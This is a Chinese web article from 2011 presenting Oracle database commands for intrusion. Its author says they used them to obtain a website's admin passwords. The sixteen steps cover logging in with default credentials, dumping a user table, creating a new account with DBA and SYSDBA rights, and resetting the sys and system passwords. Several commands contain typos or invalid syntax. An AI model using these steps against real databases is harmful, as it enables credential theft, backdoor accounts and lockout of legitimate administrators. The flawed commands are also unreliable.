移动安全 安全管理 应用案例网络威胁 系统安全 应用安全 数据安全 云安全
当前位置: 主页 > 信息安全 > 网络威胁 >

常用入侵Oracle数据库操作命令

时间:2011-05-03 15:15来源: 点击:
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。
Tags入侵(60)操作命令(7)  

  最近遇到一个使用了的,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。发现Oracle操作起来真是太麻烦,为了大家以后少走些弯路,把当中必需的命令整理出来。

  1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。

  2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager#ora9i;(这句中请把#改为@)

  3、SQL>connect / as sysdba ;(as sysoper)或 connect internal/oracle AS SYSDBA ;(scott/tiger) conn sys/change_on_install as sysdba;

  4、SQL>startup; 启动数据库实例

  5、查看当前的所有数据库: select * from v$database; select name from v$database;

  6、desc v$databases; 查看数据库结构字段

  7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限: SQL>select * from V_$PWFILE_USERS; Show user;查看当前数据库连接用户

  8、进入test数据库:database test;

  9、查看所有的数据库实例:select * from v$instance; 如:ora9i

  10、查看当前库的所有数据表: SQL> select TABLE_NAME from all_tables; select * from all_tables; SQL> select table_name from all_tables where table_name like '%u%'; TABLE_NAME ------------------------------ _default_auditing_options_

  11、查看表结构:desc all_tables;

  12、显示CQI.T_BBS_XUSER的所有字段结构: desc CQI.T_BBS_XUSER;

  13、获得CQI.T_BBS_XUSER表中的记录: select * from CQI.T_BBS_XUSER;

  14、增加数据库用户:(test11/test) create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

  15、用户授权: grant connect,resource,dba to test11; grant sysdba to test11; commit;

  16、更改数据库用户的密码:(将sys与system的密码改为test.) alter user sys indentified by test; alter user system indentified by test;

------分隔线----------------------------

推荐内容